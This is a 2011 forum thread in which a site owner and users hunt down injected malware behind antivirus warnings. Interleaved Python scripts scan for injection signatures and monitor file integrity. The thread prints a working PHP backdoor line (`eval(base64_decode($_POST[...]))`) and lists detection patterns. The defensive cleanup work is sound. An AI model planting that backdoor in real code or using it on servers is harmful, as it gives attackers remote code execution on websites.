Full Version: Ongoing fight against hackers
Mata
In the last couple of hours I've taken more steps to strengthen this site against hackers, but there will always be vulnerabilities that are harder to catch - basically, legions of hackers in poor countries can make money by finding new holes in code, therefore they always will.

If you get a virus/trojan/etc. warning from this or any of my sites please let me know immediately. Give me as many details as possible, either copy and paste text or with a screenshot of the details of the warning.

I will always try my best to keep this place secure, but there's only so much that can be done by myself and the team here. If you're not running any anti-malware, anti-virus, or a firewall then I highly recommend getting at the very least the Windows security software (which is a lot better than it used to be):

http://www.microsoft.com/en-us/security_es...ls/default.aspx

And get your browser vulnerabilities patched with Spybot:

http://www.safer-networking.org/en/index.html

Thanks for your help and patience. If anything comes up then please let me know ASAP!
Moosh
AVG popped these up when Firefox tried to load the RSS feed from your blog.
Mata
Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!
Mata
I've had a try at fixing that. Could you see if it's worked please?
snooodlysnoosnoosnoodle
AVG is still throwing up a "Threat was blocked" warning occasionally when I come to the forum, forgot to get a shot of it though... will try and remember next time it comes up!
Mata
I got a script hidden in the forum code this afternoon too. It was pretty obscure so was unlikely to be triggered often. Let me know if it happens again please, but hopefully it's fixed.
Daria
After realising that there's nowhere online I'd host a screenshot of the AVG threat, I messaged it to you on fb, Mata.
It was from the search newposts page.
Moosh
QUOTE (Mata @ Apr 20 2011, 09:14 AM)
Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!

Yeah, I think that's got it. At least AVG's not objecting anymore.
Mata
Daria is still seeing it, it seems.

Can anyone get a consistent reproduction of this problem?

Daria, can you get the error if you refresh your cached files? (I'm hoping that the script I found yesterday might have been the problem and it was lurking in your cache... But I think that's wishful thinking.)
Moosh
Speak of the devil, different day, different computer and I get:
Mata
Righty ho, I've finally managed to locate one nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)
CrazyFooIAintGettinOnNoPlane
QUOTE (Mata @ Apr 21 2011, 03:57 PM)
Righty ho, I've finally managed to locate one nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)

Hmm... my guess would be its to hijack your admin session.

CODE
if (isset($_GET["cookie"])) {                        // check if a cookie was sent in the request (i.e. user is logged in)
    echo 'cookie=4';                                 // useless
    if (isset($_POST["a9707a3e38"]))                 // check if some POST variable was sent in the HTTP request. You'd have to be redirected here from a malicious site for this to be true
        @eval(base64_decode($_POST["a9707a3e38"]));  // execute it as PHP code
    exit;                                            // useless
}
Mata
We should be good in that regard - the admin sessions are very short on here.

Has anyone had any new problems since yesterday afternoon?
Mata
Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=....matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.

I've run scans through my whole server for iframe commands and couldn't find this one. I couldn't find any nasty base64_decode commands either, so I don't think it's concealed in there. I've scanned all of my databases for iframe commands and I don't think it's in there either.

Help! Any suggestions to help find it appreciated.
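The two searches Mata describes above (a text search for 'base64_decode' across the site code, and a scan for iframe commands) can be turned into one repeatable scanner. The script below is an added example, not Mata's own tooling or anything from the forum software: it walks a web root, flags lines that match the signatures named in this thread plus a few obfuscation companions that usually travel with them, and reports file, line number and signature. The sample site it builds in a temporary directory is constructed for the demo; the backdoor line is the one quoted earlier in this thread, and the iframe host is a placeholder. Hits still need reading by hand, because base64_decode does have legitimate uses (mail and upload handling, for instance), so a hit is a lead, not a verdict.

```python
"""Scan a web root for the injection signatures discussed in this thread.

Added example (not the site's or the forum software's code). Findings are
(relative path, line number, signature name, snippet) tuples.
"""
import os
import re
import tempfile

# File types a PHP site serves or includes; cache dirs are deliberately NOT
# skipped, since the lang_cache backdoor above lived in one.
SCAN_EXTENSIONS = {".php", ".inc", ".html", ".htm", ".js", ".tpl"}

# Case-insensitive so Base64_Decode / EVAL spellings are not missed.
SIGNATURES = [
    ("base64_decode", re.compile(r"base64_decode\s*\(", re.I)),
    ("eval", re.compile(r"@?\beval\s*\(", re.I)),
    # eval fed straight from a request parameter: the shape of the quoted backdoor
    ("request-driven eval", re.compile(r"eval\s*\(.*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    # decoders commonly chained with base64_decode to hide a payload
    ("decoder chain", re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    # preg_replace with the /e modifier evaluates the replacement as PHP
    ("preg_replace /e", re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I)),
    # iframes that are sized or styled to be invisible
    ("hidden iframe", re.compile(
        r"<iframe[^>]*(display\s*:\s*none|visibility\s*:\s*hidden|(width|height)\s*=\s*[\"']?0\b)", re.I)),
]


def scan_file(path, root):
    """Return one finding per (line, signature) match in a single file."""
    findings = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, start=1):
            for name, rx in SIGNATURES:
                if rx.search(line):
                    rel = os.path.relpath(path, root).replace(os.sep, "/")
                    findings.append((rel, lineno, name, line.strip()[:80]))
    return findings


def scan_tree(root):
    """Walk root and collect findings for every file with a scanned extension."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in sorted(files):
            if os.path.splitext(fname)[1].lower() in SCAN_EXTENSIONS:
                findings.extend(scan_file(os.path.join(dirpath, fname), root))
    return sorted(findings)


# Constructed sample site: one clean file, one infected cache file (the line
# quoted in this thread), one template with a zero-size iframe.
SAMPLE_FILES = {
    "forums/cache/lang_cache/en/lang_global.php": (
        "<?php\n"
        "$lang = array('welcome' => 'Welcome back');\n"
        "if (isset($_GET[\"cookie\"])) { echo 'cookie=4'; "
        "if (isset($_POST[\"a9707a3e38\"])) @eval(base64_decode($_POST[\"a9707a3e38\"])); exit; }\n"
    ),
    "comic/index.php": "<?php\necho 'comic index';\n",
    "comic/templates/main.tpl": (
        "<html><body>\n"
        "<iframe src=\"http://example.invalid/x\" width=\"0\" height=\"0\"></iframe>\n"
        "</body></html>\n"
    ),
}


def build_sample_site():
    """Write SAMPLE_FILES into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="site_sample_")
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, lineno, name, snippet in scan_tree(build_sample_site()):
        print(f"{rel}:{lineno}  [{name}]  {snippet}")
```

Point scan_tree at the real document root (and at the cgi-bin, which the thread later finds was also seeded) rather than the sample; run it from a cron job and diff the output against the previous run so that a fresh hit stands out.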
SPEAKERfortheLOST
If you have the funding, try creating another domain like test.matazone.co.uk and recreate the comic.matazone.co.uk site there.

That way, once it is set up to your liking, you can find out if the scan is a remnant of the past infection or if there is an underlying issue to be resolved.
Daria
I got it again today, twice: once on the Mittens Zombie Game, and once on the search new posts page. Forgot to get a screenshot of either one, I'm afraid :/


On a different note, I went back through the Mr Snaffleburger cartoons today because I was showing them to a friend. I found it interesting, Mata, that they were probably a huge influence on how I thought about corporate advertising and capitalism when I was in my early teens. So, thank you!
Mata
I'd deleted the installation of PHPads and the associated database a couple of weeks ago after suspecting that this was the problem, but it seems that the evocation code was somehow compromised. I've no idea how, because the links pointed to a folder on my site and I know for a fact that the folder doesn't exist any more...

Still, I think that this has probably fixed the issue, so you're all back on watch again please - let me know if you see any trojan warnings again please!

Daria: my work here is done. It was a very deliberate choice at the time to try and make people question corporate messages (in an entertaining way). I'm very chuffed that this was effective and honoured that it may have played a tiny part in making you as awesome as you are.
Hobbes
QUOTE (Mata @ Apr 23 2011, 09:25 PM)
Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=....matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.


Your site has been showing up as clear for me, and I haven't had any alerts from virus or spyware software this time around. I've clicked my way through most of the forum and comic pages to see if anything has flagged up but nothing so far. Could it be browser-specific?
Mata
Possibly, but hopefully I've fixed it!
Mata
I've had one report of Kaspersky still being grumpy on my comic. Could people with AVG or Kaspersky clear their cached internet files and refresh the page on my comic please?

I'm really hoping I've got it fixed, but I need to know if it's not. I have never had any warnings with Firefox, Windows Security Essentials, and Spybot blocking script exploits, so I can't see these problems myself. Confirmation one way or another would be appreciated!
Pixelgoth
Got a blocked threat message but don't know how to paste it here.
Mata
Last night (about midnight UK time) I got desperate and overwrote the entire main layout template for my comic and I hope that's solved the problem there, although I would have much rather found the problem so I could identify it more easily in the future.

Pixie: did you get a warning while on my comic or on these forums? If it's on here then that's going to be a lot harder to fix, and I'm going to have to rest in the hands of Mr Fuzzy on that one. If there's anything nasty lurking on the forums (you know, other than SPS*) then I've got no idea how to find it past what I've already tried.

You can use the 'Prt Sc' button to take a screenshot of whatever is on your screen at the time. You can then paste it into MS Paint (or Photoshop preferably) and save the file. You can then attach the file to a message on Facebook.

*(We love you really, SPS).
Mata
I've had one report of a trojan still lurking on the forums. Has anyone else seen this? It's the same as before: detected with AVG and suggesting that the problem is 'Script Exploit type 1702'. Once again, I can't find anything untoward in the code.
Moosh
Yeah, I've started getting the same messages as above. Only sporadically though, not every time I come on matazone.co.uk, but they can be set off by the forums, the comic, the blog...
Mata
Rargh!

Okay, please take a screen shot with the 'more details' tab revealed, and note the URL and time please. I've got no idea where to start.

I don't know enough about this to say what it could be, but is it possible that there is something on the server itself, not actually on my pages, that is randomly blipping a trojan warning out to any .php page?
Moosh
This happened a couple of minutes ago, so about 10:05pm on 30/04/11. Got the same alerts as before, complaining about www.matazone.co.uk/blog/?feed=rss2. I clicked on the show details button but it just popped up a box saying that the process that generated the alert was firefox.

Mata
Cool, thanks.

Have you had anything while looking at my comic? If no then that suggests that the issue there could be fixed. Potentially it also means that the problem on my blog could be fixed by overwriting more of the files (the way I fixed the comic) but I don't know which files to overwrite.

I would really love to actually find the code causing the problem, rather than just overwrite it, because if I find it then it would make it much easier to find in the future (or even better, it could make it preventable).

The blog and the comic are updated to the latest versions often within hours of a new release, so they shouldn't be causing issues. It's concerning that they got infected. I'm thinking that maybe there is something lurking in the templates, because they wouldn't get overwritten with the automatic software updates... Then again, if it's the RSS code triggering it, then I've got no idea how it's getting through.

I'll keep looking. Thanks for the information!
Mata
Well, there was a link to a javascript file hosted by Amazon on the blog pages that I never got working properly. I've disabled that, but that's all I can see that I didn't know about. It's possible that someone had hijacked the Amazon script somehow... Maybe?

Let me know if it's still happening please.
Mata
I've scanned my blog and site several dozen times today and it's come up clean. Any new blips anyone?
Mata
Ah ha! I've not found it yet, but I think I've got a clue. There are base set-up files for websites, like php.ini, and I think that a randomisation script could have been added into there that occasionally triggers the malicious code. The code doesn't exist on any of my sites, instead it exists on a higher server level. I'm getting my hosts to investigate this possibility now, but I really think that this is the right direction.

I'll let you know if I get any further. Thank you for your patience and support.
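Mata's theory above, that the trigger lives in a base set-up file such as php.ini rather than in any page, is worth checking mechanically. The thread does not name the mechanism; the PHP directives that make the interpreter run an extra file on every request are auto_prepend_file and auto_append_file, and they can be set in php.ini, in a per-directory .user.ini, or (under mod_php) as php_value lines in .htaccess. The script below is an added example, not Mata's or the host's tooling: it finds those directives wherever they are set under a root, ignoring commented-out defaults. The config files and loader paths it writes into a temp directory are constructed for the demo.

```python
"""Find auto_prepend_file / auto_append_file settings under a web root.

Added example (not the site's own code). Each directive makes PHP include an
extra file on every request, which is how a clean page can still serve a
payload. Results are (relative config path, directive, value) tuples.
"""
import os
import re
import tempfile

# php.ini and .user.ini use "key = value"; .htaccess uses "php_value key value".
INI_LINE = re.compile(r"^\s*(auto_prepend_file|auto_append_file)\s*=\s*(.*?)\s*$", re.I)
HTACCESS_LINE = re.compile(
    r"^\s*php_(?:admin_)?value\s+(auto_prepend_file|auto_append_file)\s+(.*?)\s*$", re.I)
CONFIG_NAMES = {"php.ini", ".user.ini", ".htaccess"}


def directives_in(path):
    """Return (directive, value) pairs that are actually in force in one config file."""
    rx = HTACCESS_LINE if os.path.basename(path) == ".htaccess" else INI_LINE
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            # ';' comments in ini files, '#' comments in .htaccess
            if line.lstrip().startswith((";", "#")):
                continue
            m = rx.match(line)
            if not m:
                continue
            value = m.group(2).strip("\"' ")
            # an empty value or the literal "none" disables the directive
            if value and value.lower() != "none":
                hits.append((m.group(1).lower(), value))
    return hits


def find_prepend_files(root):
    """Walk root and report every active prepend/append directive found."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name in CONFIG_NAMES:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                for directive, value in directives_in(full):
                    found.append((rel, directive, value))
    return sorted(found)


# Constructed sample: a php.ini with a commented default and a live directive,
# a forum .htaccess that prepends a file from a cache dir, and a clean .user.ini.
SAMPLE_CONFIGS = {
    "php.ini": (
        "; auto_prepend_file = none\n"
        "auto_append_file =\n"
        "auto_prepend_file = \"/home/site/.cache/.loader.php\"\n"
    ),
    "forums/.htaccess": (
        "RewriteEngine On\n"
        "php_value auto_prepend_file /home/site/forums/cache/.r.php\n"
    ),
    "blog/.user.ini": "upload_max_filesize = 8M\n",
}


def build_sample_config():
    """Write SAMPLE_CONFIGS into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="cfg_sample_")
    for rel, content in SAMPLE_CONFIGS.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, directive, value in find_prepend_files(build_sample_config()):
        print(f"{rel}: {directive} = {value}")
```

On a shared host the system php.ini is usually outside the account, which is why Mata has to ask the hosting company; the .htaccess and .user.ini cases are within reach and are worth checking first. Any file a hit points at should be treated as suspect and read before it is deleted.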
Moosh
I haven't seen an alert for a while. It appears you've got it.
Mata
Thanks, but I'm actually not convinced. I don't have access to the configuration files that I suspect have been altered. I've got my hosting company investigating those, but they've been very quiet on that front. I hope they've got it completely, but it's more likely they've just disabled the main bit of it otherwise they probably would have told me that it's fixed.

A whole directory of dodgy files was installed on my server last night. I caught it as soon as it happened and we are now investigating to see if we can work out how they were placed there.

The war isn't over yet, but I definitely think that we're going in the right direction.
Mata
Okay, so a deep scan of the site files found a couple more bits skulking around in the cgi-bin (I don't think they really did anything, but it was good to clear them out), otherwise my server should be spotless.

Let me know if you have anything weird pop up. Also, please let me know if you have had trojan reports over the last month and you don't any more. I need to work out if I've caught everything and crowd sourcing is currently the best method I've got. Thanks!
Mata
Can anyone confirm that things have been clear over the last couple of weeks please?
Hobbes
I haven't come across any warnings here for some time but this was the case even when a lot of others were getting warnings coming up. But, from here, everything seems to have been okay the last couple of weeks.
Mata
Awesome. I'm glad we finally got there. It was a real pain in the bottom trying to get everything. I've got a lot more security on my sites now and I've got monitor systems in place that will let me know if anything is altered without my permission. We should be safe for the time being.

Even so, I'd like to get this forum updated to more recent software at some point. This isn't the latest version and it would be good to get up to date, so you may see some changes at some point in the future.
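The "monitor systems ... that will let me know if anything is altered" Mata mentions is file integrity monitoring, and the thread never says which tool was used. The script below is an added example of the basic technique, not Mata's setup: hash every file under the web root into a baseline stored outside that root, then re-hash later and report what was added, removed or changed. Everything the demo writes (the sample pages, the planted iframe, the dropper in cgi-bin) is constructed to mimic the kinds of change described in this thread.

```python
"""Minimal file integrity baseline for a web root.

Added example (not Mata's monitoring setup). The baseline is kept outside the
tree it describes so that write access to the site does not also grant the
ability to rewrite the record of what the site should contain.
"""
import hashlib
import json
import os
import tempfile


def sha256_of(path):
    """Hash a file in chunks so large uploads do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map every file under root (relative, forward-slash path) to its sha256."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            state[rel] = sha256_of(full)
    return state


def save_baseline(state, path):
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(state, fh, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def diff_against(baseline, current):
    """Report paths that appeared, vanished, or changed content since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def _write(root, rel, text):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo():
    """Build a constructed site, baseline it, tamper with it, return the diff."""
    root = tempfile.mkdtemp(prefix="fim_site_")
    baseline_path = os.path.join(tempfile.mkdtemp(prefix="fim_baseline_"), "baseline.json")

    _write(root, "comic/index.php", "<?php echo 'comic';\n")
    _write(root, "comic/templates/main.tpl", "<html><body>comic</body></html>\n")
    _write(root, "forums/old_plugin.php", "<?php // unused\n")
    save_baseline(snapshot(root), baseline_path)

    # Simulated tampering: an iframe planted in a template, a dropped file in
    # cgi-bin, and a file deleted. Hosts are placeholders.
    _write(root, "comic/templates/main.tpl",
           "<html><body>comic<iframe src=\"http://example.invalid/\" width=\"0\"></iframe></body></html>\n")
    _write(root, "cgi-bin/dropper.pl", "#!/usr/bin/perl\n")
    os.remove(os.path.join(root, "forums", "old_plugin.php"))

    return diff_against(load_baseline(baseline_path), snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        for p in paths:
            print(f"{kind:9} {p}")
```

In practice the baseline is regenerated right after a legitimate software update (the blog and comic updates Mata mentions would otherwise show up as hundreds of modifications), and the diff runs from cron with its output mailed out, so a single new file in cgi-bin is noticed the same night rather than a month later.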